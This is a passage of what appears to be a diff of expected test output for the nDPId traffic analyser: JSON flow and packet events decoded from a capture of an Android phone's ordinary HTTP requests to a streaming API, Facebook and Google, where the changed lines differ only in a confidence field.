9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
+00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030398,"flow_last_seen":1429000030398,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030398,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1429000030498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030498,"pkt":"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\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXc
fOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWA50EAAPwaxUgo2qfp4HCMpxe0AUOei8\/4RmPGFUBgAc1zOAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
-00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1429000030832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030832,"pkt":"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\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":358,"pkt_l4_len":322,"thread_ts_msec":1429000031075,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAVYEaUAAPwYE2wo2qfp4HAUSgSgAUG4ezi+GqNXzUBgAc8tUAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9ob21lP2FwaUtleT1xd2VydHkmZGV2aWNlPWFuZHJvaWRtb2JpbGUmbG9jYWxlPWVuZyZuZXR3b3JrPVdJRkkmcGFnZU51bWJlcj0xJnBhZ2VTaXplPTUwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiBhcGktc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7580000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1429000031382,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":109,"pkt_l4_len":73,"thread_ts_msec":1429000031382,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAF1lCkAArQY3FngcBRIKNqn6AFCBKIapX\/duHs9dUBgIImd7AAD+6U1rdHX+8GWHmWHKf1z0+O1Nfp++87\/dVNV0wP\/9v\/+n\/\/6\/AAAA\/\/8CDAD1QSSgppQFAA=="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000031698,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOOYfEAAPwb2VQo2qfqt\/EoWzD0AUOQgUs9KX9ElUBgAc0k5AABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": 
{"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1429000032158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000032158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNiNkAArAa\/H638ShYKNqn6AFDMPUpf0SXkIFOKUBgIIjgwAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogK2R4S1lRRnpNRHhKdjZkUXFVLyt4Yzd1VXVxaHpOK3BWYXpxSzdCUmswUW1oSWIxVEp3YXZ4SDRpUUV1TUVFSDVZdU80TU11R3ErWHlyOGUveHZqV2c9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000037314,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAONYlEAAPwY2Pgo2qfqt\/EoWzEAAUKq8lHZkd0MeUBg5CHxNAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": 
{"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":241,"pkt_l4_len":205,"thread_ts_msec":1429000037600,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOEBz0AAPwbyFAo2qfp4HBrngf0AUJlyzTdc8IHSUBgAc3meAABHRVQgL2dlbmVyYXRlXzIwNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogY2xpZW50czMuZ29vZ2xlLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
+00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1429000037659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":137,"pkt_l4_len":101,"thread_ts_msec":1429000037659,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHlLmEAArQY6l3gcGucKNqn6AFCB\/VzwgdKZcs3wUBgIIqKRAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNClNlcnZlcjogR0ZFLzIuMA0KDQo="} 
00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1429000037771,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000037771,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUMgAkAArQYAVK38ShYKNqn6AFDMQGR3Qx6qvJUxUBj\/\/2USAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogSENQcUMxYW5HZGxXZUVqMEIwU3F1MHVIQzU2N3BTRzJERlZvSXdHYmRXNFovN1dydjVhM0ZQZEY5V1FIMDUrNFREZVFXV3FiZjA4djA4c1RURE81VWc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 